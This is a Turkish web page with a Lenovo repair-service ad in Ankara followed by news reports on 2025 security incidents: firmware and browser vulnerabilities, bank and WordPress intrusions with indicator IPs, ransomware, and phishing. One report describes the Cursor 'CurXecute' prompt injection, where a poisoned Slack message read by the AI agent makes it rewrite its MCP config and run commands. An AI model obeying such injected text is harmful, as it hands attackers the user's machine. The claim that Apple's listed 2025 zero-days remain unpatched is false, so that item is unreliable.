Ankara’da Lenovo teknik servisi arayanlar için hızlı, güvenilir ve profesyonel bir çözüm sunuyoruz. Yılların verdiği deneyim, müşteri odaklı yaklaşım ve kaliteli hizmet anlayışımızla Lenovo cihazlarınızı güvenle bize emanet edebilirsiniz.

Hemen bizimle iletişime geçerek randevu oluşturabilir, cihazınızı teknik servisimize ulaştırabilirsiniz. Arıza ne olursa olsun, çözüm burada.

Lenovo teknik servisine ulaşmak için aşağıdaki iletişim bilgilerini kullanabilirsiniz:

Adres: Eti Mahallesi, Toros Sokak No:8 D:1, 06570 Çankaya / Ankara
Telefon: (0312) 229 31 66

Kaynak: CUMHA - CUMHUR HABER AJANSI

Lenovo, belirli hepsi bir arada (All-in-One) masaüstü bilgisayar modellerinde bulunan ve Secure Boot mekanizmasını aşmaya imkân tanıyan altı yüksek önem derecesine sahip BIOS açığını kapatmak amacıyla yeni firmware güncellemeleri yayımladı.

Güvenlik Açıklarının Kaynağı ve Etkisi

Açıklar, Lenovo için Insyde tarafından özelleştirilen InsydeH2O UEFI firmware kodlarında bulunuyor. Saldırganlar için büyük tehlike arz eden bu açıklar, işletim sistemi yüklenmeden önce çalışan ve yüksek kalıcılığa sahip System Management Mode (SMM) katmanında yer alıyor. Bu sayede, kötü niyetli kişiler sisteme derinlemesine erişim sağlayabiliyor.

Etkilenen Modeller

• IdeaCentre AIO 3 24ARR9
• IdeaCentre AIO 3 27ARR9
• Yoga AIO 27IAH10
• Yoga AIO 32ILL10
• Yoga AIO 32IRH8

Tespit Edilen Güvenlik Açıkları ve CVSS Puanları

• CVE-2025-4421: Doğrulanmamış RSI kaydı ile SMRAM belleğe yazım yapılabiliyor. (CVSS: 8.2)
• CVE-2025-4422: SMM bellekte bozulmaya yol açan işleyici açığı. (CVSS: 8.2)
• CVE-2025-4423: SMM içerisinde keyfi bellek yazımı ile kod çalıştırma. (CVSS: 8.2)
• CVE-2025-4424: Yanıltıcı girişlerle firmware ayarlarının değiştirilmesi. (CVSS: 6.0)
• CVE-2025-4425: Stack buffer overflow ile SMM yetki yükselmesi ve kod çalıştırma. (CVSS: 8.2)
• CVE-2025-4426: SMRAM içeriğinin sızdırılması yoluyla hassas veri açığa çıkması. (CVSS: 6.0)

Bildirim ve Koordinasyon Süreci

Binarly güvenlik araştırma firması, bu açıkları 8 Nisan 2025 tarihinde Lenovo’ya bildirdi. Lenovo, 16 Haziran’da durumu doğruladı ve 90 günlük koordineli açıklama sürecinin ardından 29 Temmuz 2025’te kamuoyuna duyurdu.

Güncellemeler ve Tavsiyeler

IdeaCentre AIO 3 modelleri için O6BKT1AA firmware sürümü yayımlandı ve kullanıcılara en kısa sürede güncelleme yapmaları öneriliyor. Yoga AIO modelleri için güncellemeler henüz yayımlanmadı; Lenovo, bu yamaların 30 Eylül – 30 Kasım 2025 tarihleri arasında sunulacağını bildirdi.

Insyde tarafından yapılan açıklamada, bu açıkların sadece Lenovo için geliştirilmiş özelleştirilmiş InsydeH2O firmware sürümlerinde bulunduğu, tüm InsydeH2O kullanan sistemlerin etkilenmediği vurgulandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Apple, Chrome kullanıcılarını hedef alan ve CVE-2025-6558 numarasıyla izlenen yüksek riskli sıfır gün güvenlik açığını düzeltmek amacıyla kapsamlı güncellemeler yayımladı. Bu açık, Apple’ın çoğu platformunu etkileyen ANGLE (Almost Native Graphics Layer Engine) adlı grafik soyutlama katmanında tespit edildi.

Açığın Detayları ve Riskleri

ANGLE bileşeni, OpenGL ES API çağrılarını Direct3D, Metal, Vulkan ve OpenGL gibi grafik API’lerine dönüştürür. CVE-2025-6558, özel hazırlanmış HTML sayfaları aracılığıyla tarayıcının GPU sürecinde rastgele kod çalıştırılmasına imkân veriyor. Bu da tarayıcı sandbox güvenlik sınırlarının aşılmasına ve sistem üzerinde potansiyel tam kontrol sağlanmasına yol açabiliyor.

Keşif ve Yama Süreci

Google Tehdit Analiz Grubu (TAG) araştırmacıları Vlad Stolyarov ve Clément Lecigne tarafından Haziran 2025’te keşfedilen açık, 15 Temmuz’da Chrome ekibine bildirildi ve hızla yamalandı. Google, bu açığın devlet destekli tehdit aktörleri tarafından aktif şekilde kullanıldığını doğruladı.

Apple’ın Güncellemeleri

• iOS 18.6 ve iPadOS 18.6: iPhone XS ve sonrası, çeşitli iPad Pro, iPad Air ve iPad mini modelleri
• macOS Sequoia 15.6
• iPadOS 17.7.9: iPad Pro 12.9 inç 2. nesil, 10.5 inç modeli ve iPad 6. nesil
• tvOS 18.6: Apple TV HD ve tüm Apple TV 4K modelleri
• visionOS 2.6: Apple Vision Pro
• watchOS 11.6: Apple Watch Series 6 ve sonrası

Apple, güncellemeye ilişkin açıklamasında “Kötü amaçlı web içeriğinin işlenmesi, Safari’nin beklenmedik şekilde çökmesine neden olabilir” ifadelerini kullandı ve açığın yalnızca Apple yazılımlarında değil, aynı zamanda açık kaynak projelerde de bulunduğunu belirtti.

CISA’dan Zorunlu Güncelleme Talimatı

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-6558 açığını aktif olarak istismar edilen güvenlik açıkları listesine ekleyerek federal kurumlara 12 Ağustos 2025’e kadar yama uygulamalarını zorunlu kıldı. Ayrıca, tüm sistem yöneticilerine de öncelikli olarak bu açığın kapatılması çağrısı yapıldı.

Apple’ın 2025’te Düzeltmediği Diğer Sıfır Gün Açıkları

2025 yılı başından itibaren Apple tarafından halen yamalanmamış olan diğer kritik sıfır gün açıkları şunlardır:

• CVE-2025-24085 (Ocak 2025)
• CVE-2025-24200 (Şubat 2025)
• CVE-2025-24201 (Mart 2025)
• CVE-2025-31200 ve CVE-2025-31201 (Nisan 2025)

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uluslararası düzeyde bankacılık sistemlerine yönelik siber saldırılarıyla tanınan LightBasin (UNC2891) grubu, fiziksel erişim sağladığı bir bankada sofistike bir hibrit saldırı gerçekleştirdi. Grup, ATM ağına bağlı bir ağ anahtarına 4G modemli Raspberry Pi cihazı yerleştirerek güvenlik duvarlarını aşmayı ve iç ağa kalıcı uzaktan erişim sağlamayı başardı.

Saldırı Tespiti ve Amaç

Group-IB güvenlik firması, bankanın ağında tespit ettiği şüpheli trafik üzerine yaptığı incelemede bu saldırıyı ortaya çıkardı. Saldırının hedefi, ATM işlemlerini taklit ederek haksız nakit para çekimi gerçekleştirmekti.

TinyShell ile Gizli Komuta Kontrol (C2) Bağlantısı

Saldırganlar, Raspberry Pi cihazını TinyShell adlı açık kaynaklı arka kapı yazılımı ile komuta ve kontrol (C2) merkezi olarak yapılandırdı. Cihaz, 4G bağlantısıyla dış dünya ile gizli iletişim kurdu.

Ağda yatay hareketler gerçekleştirilerek Banka'nın Ağ İzleme Sunucusu’na ve ardından doğrudan internet erişimi bulunan E-posta Sunucusu’na erişildi. Böylece saldırganlar iç ağda kalıcı ve geniş kapsamlı erişim sağladı.

İleri Teknikler ve Gizlenme Yöntemleri

Zararlı yazılımlar, Linux sistemlerinde yaygın olan “LightDM” ekran yöneticisine benzer şekilde “lightdm” ismiyle kaydedilerek tespit edilmekten kaçınıldı. Ayrıca tmpfs ve ext4 dosya sistemleri kullanılarak zararlı süreçlerin /proc/[pid] yollarına bağlanması sağlandı; bu teknik adli analiz araçlarının işlem geçmişini görmesini engelledi.

Son Hedef: Caketap Rootkit

LightBasin’in nihai hedefi, Oracle Solaris tabanlı sistemlere Caketap adlı özel rootkit’i kurmaktı. Bu rootkit, ödeme sistemlerindeki HSM (Hardware Security Module) yanıtlarını manipüle ederek reddedilen işlemlerin onaylanmış gibi görünmesini sağlıyordu.

Ancak saldırganlar bu amaca ulaşamadan tespit edildi. Group-IB uzmanları, başarılı olsaydı büyük maddi kayıplar ve ciddi güvenlik ihlalleri yaşanabileceğini vurguladı.

Fiziksel Sızma Şüpheleri ve Ağ İletişimi

Saldırganların bankanın şubesine fiziksel erişim sağlayıp sağlamadığı veya bir içeriden destek alıp almadığı henüz kesinleşmedi. Ağ izleme sunucusunun her 600 saniyede bir, Raspberry Pi cihazına 929 numaralı port üzerinden veri gönderdiği belirlendi; bu da cihazın ağda pivot noktası olarak kullanıldığını gösteriyor.

LightBasin Grubunun Geçmişi

2016’dan beri finans ve telekom sektörlerine yönelik karmaşık siber operasyonlar yürüten LightBasin, Unix sistemleri ve mobil ağ altyapılarına yönelik çok sayıda saldırı gerçekleştirmiş gelişmiş bir tehdit aktörüdür.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber saldırganlar, WordPress’in yaygın kullanılan Alone temasında tespit edilen CVE-2025-5394 kodlu kritik açığı aktif şekilde istismar ediyor. Bu zafiyet, uzaktan kimlik doğrulaması olmadan rastgele dosya yüklenmesine ve siteye tam erişim sağlanmasına yol açıyor.

Saldırı Yöntemi ve Etkileri

Wordfence tarafından tespit edilen saldırılar, Alone temasının alone_import_pack_install_plugin() işlevindeki güvenlik kontrol eksikliğinden kaynaklanıyor. Bu işlev, WordPress’teki wp_ajax_nopriv_ kancası aracılığıyla yetkisiz kullanıcıların dış URL’lerden eklenti kurmasına izin veriyor.

Saldırganlar, bu açığı kullanarak şifre korumalı PHP arka kapılar, ZIP arşivlerine gizlenmiş web shell’ler veya veritabanına erişim sağlayan dosya yöneticileri yüklüyor. Ayrıca, gizli yönetici hesapları oluşturularak kalıcı erişim sağlanıyor.

İstatistikler ve Tespit Edilen Saldırılar

Wordfence, açığın kamuya açıklanmasından önce saldırıların başladığını ve şu ana kadar 120 binden fazla istismar girişiminin engellendiğini açıkladı. Saldırı belirtileri arasında yeni yönetici kullanıcıların oluşması, şüpheli ZIP dosyaları ve olağandışı admin-ajax.php?action=alone_import_pack_install_plugin HTTP istekleri yer alıyor.

Engellenmesi Önerilen IP Adresleri

• 193.84.71.244
• 87.120.92.24
• 146.19.213.18
• 2a0b:4141:820:752::2

Sistem yöneticilerinin bu IP adreslerini engellemesi öneriliyor.

Yama ve İletişim Problemi

Alone temasının 7.8.3 ve önceki sürümleri saldırıya açık durumda. Geliştirici Bearsthemes, 16 Haziran 2025’te 7.8.5 sürümüyle açığı yamaladı. Ancak Wordfence, ilk bildirimi 30 Mayıs’ta yapmasına rağmen geliştiriciden yanıt alamadığı için durumu 12 Haziran’da Envato Market ekibine iletmek zorunda kaldı.

Temanın Kullanım Alanları ve Benzer Olaylar

Alone teması, Envato pazarında yaklaşık 10 bin satışa sahip olup, özellikle yardım kuruluşları, sivil toplum örgütleri ve bağış platformları tarafından tercih ediliyor.

Geçen ay, Motors adlı başka bir popüler WordPress temasında da kullanıcı doğrulama açığı kullanılarak site yöneticisi hesapları ele geçirilmişti.

Uzmanlar, WordPress kullanıcılarını temaların yanı sıra eklenti ve çekirdek bileşenleri düzenli olarak güncellemeleri konusunda uyarıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

SafePay adlı fidye yazılımı grubu, küresel bilgi teknolojileri distribütörü Ingram Micro’nun sistemlerinden ele geçirildiği iddia edilen 3,5 terabaytlık veriyi sızdırma tehdidinde bulundu. Grup, şirket verilerini karanlık ağdaki sızıntı portalında yayımlamayı planladığını açıkladı.

Ingram Micro; donanım, yazılım, bulut hizmetleri, lojistik ve eğitim alanlarında dünya çapında bayilere ve yönetilen hizmet sağlayıcılarına çözümler sunan çok uluslu bir teknoloji şirketidir.

Olayın Gelişimi

İlk bildirim 5 Temmuz’da yapılmış, SafePay grubunun saldırının arkasında olduğu bilgisi paylaşılmıştı. Ancak saldırı grubu, taahhüdünü resmi olarak bu hafta başında doğruladı.

SafePay, kurban sistemleri şifrelemeden önce hassas verileri ele geçirip ödeme alınmadığı takdirde bunları yayımlamakla bilinen bir fidye grubu. 2024 Eylül’den beri 260’tan fazla kurbanı karanlık ağda listeliyor.

Etkiler ve Şirketin Yanıtı

Saldırı, Ingram Micro’nun küresel operasyonlarında kesintilere neden oldu. İnternet sitesi ve sipariş sistemleri kapandı, çalışanlara evden çalışma talimatı verildi.

Şirket, VPN erişimini yeniden sağlamak için çalıştı, parola ve çok faktörlü kimlik doğrulama (MFA) sistemlerini kapsamlı şekilde sıfırladı. Dört gün içinde tüm bölgelerdeki faaliyetler yeniden başlatıldı.

Ancak Ingram Micro, SafePay’in saldırıdan sorumlu olup olmadığı veya verilerin gerçekten sızdırılıp sızdırılmadığı konusunda henüz resmi açıklama yapmadı.

Basın kuruluşları, şirketten konuyla ilgili bilgi almakta zorlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik yarışması Pwn2Own, 2025 İrlanda ayağında kullanıcı etkileşimi olmadan çalışan (zero-click) bir WhatsApp güvenlik açığı keşfeden araştırmacıya 1 milyon dolar ödül verileceğini duyurdu.

Etkinliği organize eden Zero Day Initiative (ZDI), WhatsApp’ın dünya genelinde 3 milyardan fazla kullanıcıya sahip olduğunu ve böyle bir açığın kritik öneme sahip olduğunu belirtti. Bu açık sayesinde hedef cihaza kullanıcı herhangi bir işlem yapmadan zararlı kod yüklenebiliyor.

Etkinlik Detayları ve Kategoriler

Pwn2Own Ireland 2025, 21-24 Ekim tarihleri arasında İrlanda’nın Cork kentinde düzenlenecek. Yarışmanın sponsorları arasında Meta, Synology ve QNAP bulunuyor. Meta, WhatsApp açıklarına özel ilgi göstererek bu kategori için rekor ödül seviyesini belirledi.

Yarışmada yalnızca WhatsApp değil, akıllı telefonlar, mesajlaşma uygulamaları, ev ağı ekipmanları, giyilebilir cihazlar, akıllı gözlükler ve yazıcılar gibi sekiz farklı kategoriye yönelik saldırı senaryoları değerlendirilecek.

Bu yıl mobil cihaz kategorisi için saldırı yüzeyi genişletildi. Yarışmacılar USB bağlantısı yoluyla fiziksel olarak kilitli telefonlara da sızmayı deneyebilecek. Wi-Fi, Bluetooth ve NFC gibi kablosuz protokoller saldırı yöntemleri arasında yer almaya devam ediyor.

Başvuru ve Ödül Süreci

Kayıtlar 16 Ekim 2025, saat 17:00'ye kadar alınacak ve yarışma sıralaması kura ile belirlenecek. ZDI’nın amacı, güvenlik açıklarının kötü niyetlilerden önce tespit edilerek üretici firmalarla iş birliği içinde kapatılmasıdır.

Tespit edilen açıklar firmalara bildirilecek, 90 gün içinde yamalanmazsa kamuoyuna açıklanabilecek.

Geçmişten Notlar

2024 Pwn2Own Ireland etkinliğinde 70'ten fazla sıfır gün açığı keşfedildi ve toplamda 1 milyon doların üzerinde ödül dağıtıldı. Örneğin Viettel Cyber Security ekibi, QNAP NAS, Sonos hoparlör ve Lexmark yazıcı açıkları ile 205 bin dolar kazandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yapay zekâ destekli kod editörü Cursor'da tespit edilen yeni bir güvenlik açığı, sistemde geliştirici ayrıcalıklarıyla uzaktan komut çalıştırılmasına olanak tanıyor. Araştırma şirketi Aim Security tarafından "CurXecute" adı verilen bu zafiyet, CVE-2025-54135 olarak kayda geçti.

Cursor IDE, Model Context Protocol (MCP) adlı açık standart sayesinde yapay zekâ ajanlarının harici kaynaklarla bağlantı kurup işlevsel olmasını sağlıyor. Ancak MCP yapısı, ajanın kontrol akışının kötü niyetli girdilerle manipüle edilmesine zemin hazırlıyor.

Zararlı Prompt Dosyası Yazdırabiliyor

CurXecute açığından faydalanan saldırganlar, ajana dış kaynaktan gönderilen zararlı komut dizileriyle ~/.cursor/mcp.json dosyasını yeniden yazabiliyor. Kullanıcının bilgisi olmadan bu dosya diske kaydediliyor ve böylece uzaktan komut çalıştırma mümkün hale geliyor.

Aim Security’ye göre dosya değişiklikleri kullanıcı tarafından reddedilse bile etkisi sürüyor; bu da kullanıcı etkileşimi olmadan saldırıların başarıyla yürütülebilmesine sebep oluyor.

Örneğin, MCP destekli Slack sunucularına zararlı bir prompt yerleştirilip, geliştiricinin bu mesajları özetlemesi için ajan kullanılması halinde kötü amaçlı betikler çalıştırılabiliyor.

“Zehirli tek bir belge, yerel yapay zekâ ajanını sistem kabuğuna dönüştürebilir.” — Aim Security

Yama ve Tavsiyeler

CurXecute açığı 7 Temmuz 2025’te Cursor geliştirici ekibine bildirildi, ertesi gün yazılım ana dalına yama eklendi. 29 Temmuz’da yayımlanan Cursor 1.3 sürümü bu açığı kapatan güncellemeleri içeriyor.

Cursor ekibi, CVE-2025-54135 için yayınladığı güvenlik danışma metninde, kullanıcıların mümkün olan en kısa sürede güncellemeye geçmelerini ve eski sürümleri kullanmamalarını öneriyor. Açık, 8.6 skorla “orta seviye kritik” olarak derecelendirildi.

Araştırmacılar, bu açığın fidye yazılım saldırıları, veri sızıntıları, yapay zekâ bazlı yanlış yönlendirmeler (hallusinasyonlar) ve proje bütünlüğünü tehdit eden sızıntı tabanlı saldırılara yol açabileceği konusunda uyarıda bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Popüler reklam engelleme çözümü Pi-hole, WordPress bağış eklentisi GiveWP’de tespit edilen kritik bir güvenlik açığı nedeniyle kullanıcı verilerinin sızdırıldığını duyurdu.

Kuruluş, 28 Temmuz Pazartesi günü bağışçılardan gelen şüpheli e-posta bildirimleri üzerine durumu fark etti. Yapılan teknik inceleme, GiveWP eklentisinin bir açığından dolayı bağış yapan kullanıcıların isim ve e-posta adreslerinin, herhangi bir kimlik doğrulama olmaksızın sayfanın kaynak kodunu görüntüleyen herkes tarafından erişilebilir olduğunu ortaya koydu.

Veri ihlali yalnızca bağış formu üzerinden destek veren kullanıcıları etkilerken, Pi-hole’un kendi yazılımı bu olaydan etkilenmedi.

Yaklaşık 30 Bin Bağışçı Etkilendi

1 Ağustos Cuma yayımlanan analizde, veri ihlali bildirim servisi Have I Been Pwned yaklaşık 30 bin bağışçının etkilendiğini belirtti. Sızan kayıtların %73’ü, daha önce başka ihlallerde de ifşa olmuş kullanıcı bilgilerini içeriyor.

Pi-hole, finansal bilgilerin Stripe ve PayPal tarafından işlendiğini, bu nedenle kredi kartı veya ödeme detaylarının sızdırılmadığını vurguladı.

Bağış formunda kullanıcıların geçerli isim veya e-posta girmesi zorunlu olmasa da, tüm bağışçı bilgilerine internet üzerinden erişilebilmesinden dolayı Pi-hole özür diledi.

Gecikmeli Bilgilendirme ve Eleştiriler

GiveWP geliştirici ekibi, açığı GitHub’da rapor edilmesinden birkaç saat sonra gidererek 4.6.1 sürümünü yayımladı. Ancak Pi-hole, geliştiricinin kullanıcı bilgilendirmede geciktiğini ve olayın ciddiyetini yeterince önemsemediğini savundu.

Pi-hole açıklamasında, “Kullandığımız yazılımların sorumluluğu bize aittir. Yaygın kullanılan bir eklentiye güven duyduk ve bu güven boşa çıktı. Etkilenen tüm bağışçılardan özür dileriz.” ifadesi yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik şirketi Arctic Wolf'un açıklamasına göre, Temmuz ayının ikinci yarısından itibaren SonicWall güvenlik duvarı cihazları Akira fidye yazılımı saldırılarında hedef alınmaya başladı. Saldırganların, henüz doğrulanmamış olmakla birlikte, daha önce bilinmeyen bir güvenlik açığını kullanıyor olabileceği değerlendiriliyor.

Akira fidye yazılımı Mart 2023'te ortaya çıktı ve kısa sürede dünya genelinde çok sayıda sektörü hedef aldı. Bugüne kadar 300’den fazla kurumu karanlık ağ sızıntı portalına ekleyen grup; Nissan, Hitachi ve Stanford Üniversitesi gibi yüksek profilli kuruluşlara yönelik saldırılarla dikkat çekti. FBI verilerine göre, Akira grubu Nisan 2024 itibarıyla 250'den fazla kurbanından toplamda 42 milyon doların üzerinde fidye topladı.

Arctic Wolf Labs araştırmacıları, saldırıların çoğunun SonicWall SSL VPN bağlantıları üzerinden yetkisiz erişim yoluyla gerçekleştiğini, ilk sızmanın 15 Temmuz'da gözlendiğini açıkladı. Henüz erişim yöntemi kesinleşmemekle birlikte, bir sıfırıncı gün açığı olasılığı güçlü şekilde değerlendiriliyor. Ancak brute force, sözlük saldırıları veya kimlik bilgisi dolandırıcılığı gibi yöntemlerin de tamamen dışlanmadığı belirtildi.

Uzun Süreli ve Hedefli Kampanya

Saldırganlar, VPN üzerinden sağlanan ağ erişimini çok kısa sürede veri şifreleme aşamasına taşıyor. Bu durum, Ekim 2024’ten bu yana tespit edilen benzer saldırı örüntüleriyle örtüşüyor ve SonicWall cihazlarına yönelik süregelen ve organize bir kampanyaya işaret ediyor.

VPN bağlantılarında genellikle geniş bant internet servis sağlayıcıları kullanılırken, bu saldırılarda sanal özel sunucu (VPS) tabanlı VPN kimlik doğrulama hizmetlerinin tercih edildiği tespit edildi. Bu detay, saldırıların sistematik biçimde yürütüldüğünü ortaya koyuyor.

Arctic Wolf’un Tavsiyeleri ve Güvenlik Önlemleri

Arctic Wolf, SonicWall cihazlarında potansiyel bir sıfırıncı gün açığının aktif olarak istismar ediliyor olabileceği ihtimaline karşı, yöneticilere SSL VPN hizmetlerini geçici olarak devre dışı bırakmalarını tavsiye etti. Ayrıca detaylı günlük kaydı alma, uç nokta izleme ve VPS tabanlı VPN oturumlarının engellenmesi gibi ek güvenlik önlemlerinin devreye alınması gerektiği bildirildi.

SMA 100 Cihazları İçin Güncelleme Uyarısı

Saldırılara ilişkin Arctic Wolf raporu, SonicWall’un müşterilerini SMA 100 cihazlarındaki kritik bir güvenlik açığı (CVE-2025-40599) hakkında uyarmasından bir hafta sonra yayımlandı. SonicWall, söz konusu açığın kötüye kullanılabilmesi için yönetici ayrıcalığı gerektiğini ve şu anda aktif bir sömürü izine rastlanmadığını belirtti. Ancak yine de tüm kullanıcıların sistemlerini güncellemeleri istendi.

Google Threat Intelligence Group (GTIG) tarafından yayımlanan bir başka raporda, saldırganların yetkisiz erişim elde ettikten sonra OVERSTEP adlı yeni bir rootkit zararlı yazılım yüklediği belirtildi.

SonicWall, sanal veya fiziksel SMA 100 cihazı kullanan tüm müşterilere, GTIG tarafından paylaşılan bulgu göstergeleri (IoC) doğrultusunda sistem günlüklerini incelemeleri ve şüpheli faaliyet durumunda destek ekipleriyle irtibata geçmeleri çağrısında bulundu.

Not: SonicWall tarafından konuya ilişkin henüz resmi bir açıklama yapılmamıştır.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Python topluluğunun resmi paket deposu olan PyPI (Python Package Index), bu hafta kullanıcılarını sahte bir web sitesi üzerinden yürütülen kimlik avı saldırısına karşı uyardı. Saldırganlar, PyPI geliştiricilerine "[PyPI] Email verification" başlıklı ve noreply@pypj.org adresinden gönderilen e-postalarla ulaşıyor.

PyPI yöneticisi Mike Fiedler tarafından yapılan açıklamada, “Bu durum PyPI platformunun güvenliğini ihlal eden bir saldırı değil, kullanıcı güvenini istismar eden bir kimlik avı girişimidir. Kullanıcılardan e-postalarını doğrulamaları isteniyor ve sahte bir siteye yönlendiriliyorlar.” ifadeleri kullanıldı.

Söz konusu sahte site, resmi PyPI platformuna görsel olarak benzeyecek şekilde tasarlanmış ve kullanıcıları oturum açmaya yönlendiriyor. Ancak bu giriş bilgilerinin gerçek PyPI’ye iletilmesi yerine saldırganlar tarafından toplandığı belirtiliyor.

Hedef: Hesap Ele Geçirme ve Zararlı Paket Yükleme

Saldırganların amacı, geliştiricilere ait PyPI hesaplarını ele geçirerek daha önce yayımlanmış Python paketlerine kötü amaçlı kod enjekte etmek veya yeni zararlı paketler yüklemek. Bu tür saldırılar, açık kaynak yazılım ekosisteminde geniş çaplı güvenlik tehditlerine yol açabiliyor.

PyPI Platformu Önlem Aldı

PyPI yöneticileri, sitenin ana sayfasına bir uyarı bandı ekleyerek kullanıcıları aktif olarak bilgilendirmeye başladı. Ayrıca, alan adı sağlayıcıları ve CDN firmalarına marka ihlali ve kötüye kullanım bildirimleri gönderildiği belirtildi.

Kullanıcılardan şu önlemleri almaları istendi:

• noreply@pypj.org adresinden gelen e-postalara tıklamadan silinmesi,
• Daha önce bu sahte sitede kullanıcı bilgisi girildiyse, şifrelerinin derhal değiştirilmesi,
• Hesaplarının Security History bölümü üzerinden şüpheli etkinliklerin kontrol edilmesi.

Daha Önce de Saldırılar Yaşanmıştı

Python Software Foundation, geçtiğimiz yıl yüzlerce zararlı paketin yüklenmesiyle sonuçlanan bir kampanya nedeniyle geçici olarak yeni kullanıcı kaydı ve proje oluşturma işlemlerini durdurmak zorunda kalmıştı. Ayrıca Şubat 2025’te başlatılan Project Archival sistemiyle, artık güncelleme almayacak projelerin arşivlenmesi kolaylaştırılmıştı.

Uzmanlar, açık kaynak topluluklarında yer alan geliştiricilerin e-posta adreslerini içeren meta verilerinin saldırganlar için değerli bir kaynak olduğunu ve bu verilerin kimlik avı kampanyalarında kullanılabileceğini hatırlatıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber güvenlik kaynaklarına göre, ShinyHunters olarak bilinen siber suç grubu, Qantas, Allianz Life, LVMH ve Adidas gibi önde gelen firmaları hedef alan geniş kapsamlı veri hırsızlığı saldırılarının arkasında yer alıyor. Söz konusu saldırılar, şirketlerin kullandığı Salesforce CRM platformlarına yönelik sosyal mühendislik yöntemleriyle gerçekleştirildi.

Google’ın Tehdit İstihbarat Grubu (GTIG), Haziran 2025'te bu tür saldırıların arttığını ve saldırganların UNC6040 olarak izlendiğini bildirmişti. Bu kapsamda, saldırganlar BT destek personeli gibi davranarak kurbanları telefonla aradı ve onları Salesforce'un bağlı uygulama kurulumu sayfasına yönlendirdi. Kullanıcılardan sahte "bağlantı kodları" girilmesi istendi. Böylece, kötü amaçlı olarak kurgulanmış Data Loader uygulaması kurbanın hesabına bağlanabildi.

Bazı saldırılarda, bu uygulama “My Ticket Portal” adıyla yeniden adlandırılarak daha inandırıcı hale getirildi. Kimlik avı sürecinde ayrıca sahte Okta giriş sayfaları da kullanılarak kullanıcıların kimlik bilgileri ve çok faktörlü kimlik doğrulama (MFA) token'ları da ele geçirildi.

Hedef Olan Şirketler

• LVMH bünyesindeki Louis Vuitton, Dior ve Tiffany & Co., müşteri veritabanlarına yetkisiz erişim sağlandığını doğruladı.
• Allianz Life, 16 Temmuz 2025’te üçüncü taraf bir bulut tabanlı CRM sistemi üzerinden erişim sağlandığını açıkladı.
• Qantas, olayın Salesforce ile ilgili olduğunu doğrulamazken, yerel medya verilerin Salesforce sistemi üzerinden çalındığını bildirdi.
• Adidas da benzer bir CRM saldırısından etkilendiğini duyurdu.

Adli belgeler, saldırıların özellikle Salesforce’un "Accounts" ve "Contacts" tablolarına odaklandığını ortaya koyuyor. Tüm saldırılar aynı kampanyaya işaret ederken, şirketlere gönderilen özel e-postalarda kendilerini "ShinyHunters" olarak tanıtan tehdit aktörlerinin şirketleri özel olarak şantaj yoluyla hedef aldığı belirtildi.

Grup Yapısı ve Saldırı Yöntemleri

ShinyHunters grubu, daha önce Snowflake veri sızıntısı, AT&T, Oracle Cloud, PowerSchool gibi büyük ölçekli olaylarla gündeme gelmişti. Grup, genellikle şirket ağlarına tam erişim sağlamak yerine veri çalımı ve özel şantaj yöntemlerine odaklanıyor.

Bazı güvenlik araştırmacıları, ShinyHunters’ın zaman zaman Scattered Spider olarak bilinen ve daha agresif yöntemler kullanan başka bir grupla örtüşen üyelik yapısına sahip olduğunu düşünüyor. Her iki grubun da Lapsus$ adlı eski hacker kolektifiyle bağlantılı olabileceği iddia ediliyor.

Ayrıca, ShinyHunters’ın bazı durumlarda doğrudan saldırıyı gerçekleştirmeyip, üçüncü tarafların çaldığı verileri komisyon karşılığında pazarlayan bir “extortion-as-a-service” (şantaj hizmeti) grubu olarak faaliyet gösterdiği de öne sürülüyor.

Salesforce: Platform Değil, Kullanıcılar Hedef Alınıyor

Salesforce, yapılan açıklamada sistemlerinde herhangi bir zafiyet olmadığını ve saldırıların tamamen kullanıcılara yönelik sosyal mühendislik yöntemleriyle gerçekleştiğini belirtti.

Şirket, kullanıcıların aşağıdaki güvenlik önlemlerini uygulamasını öneriyor:

• Güvenilen IP aralıklarını zorunlu hale getirme
• En az yetki ilkesine uygun yetkilendirme
• Çok faktörlü kimlik doğrulama (MFA) kullanımı
• Bağlı uygulamalara erişimi sınırlandırma
• Salesforce Shield ile gelişmiş izleme ve olay politikaları kullanımı
• Güvenlik olayları için belirli bir güvenlik iletişim kişisi tanımlama

Kaynak: CUMHA - CUMHUR HABER AJANSI

Gizlilik odaklı hizmetleriyle tanınan İsviçre merkezli teknoloji şirketi Proton, yeni Proton Authenticator uygulamasını yayımladığını duyurdu. Uygulama, Windows, macOS, Linux, Android ve iOS platformlarında çalışıyor ve tamamen ücretsiz olarak indirilebiliyor.

Proton Authenticator, çevrimdışı çalışan ve her 30 saniyede bir yenilenen zaman tabanlı tek kullanımlık şifreler (TOTP) üreterek kullanıcıların çevrimiçi hesaplarını daha güvenli hale getiriyor. Bu kodlar, parolaların yanı sıra ikinci bir doğrulama katmanı olarak kullanılıyor.

Uygulama, reklam içermiyor, kullanıcı takibi yapmıyor ve Proton hesabı gerektirmeden kullanılabiliyor. Bu yönüyle Google Authenticator, Microsoft Authenticator ve Authy gibi yaygın uygulamalardan ayrılıyor. Proton yetkilileri, “Bu uygulama, gizlilik, şeffaflık ve kullanıcı odaklı güvenlik ilkeleriyle geliştirildi” açıklamasında bulundu.

Proton Authenticator’ın Öne Çıkan Özellikleri

• Tamamen çevrimdışı çalışabilen zaman tabanlı doğrulama kodları,
• Uçtan uca şifreli çoklu cihaz senkronizasyonu,
• Diğer platformlara geçişi kolaylaştıran içe/dışa aktarma özelliği,
• Biyometrik ya da PIN ile uygulama kilitleme,
• Otomatik şifreli yedekleme sistemi,
• Kullanıcı verilerinin hiçbir Proton sunucusuna gönderilmemesi,
• Yakında yayımlanması planlanan açık kaynak kod yapısı.

Ayrıca Proton Authenticator, pek çok popüler uygulamada olmayan bir özellikle geliyor: TOTP anahtarlarının dışa aktarılabilmesi, yani kullanıcıların tüm hesaplarını başka bir cihaza veya uygulamaya taşırken veri kaybı yaşamaması mümkün hale geliyor.

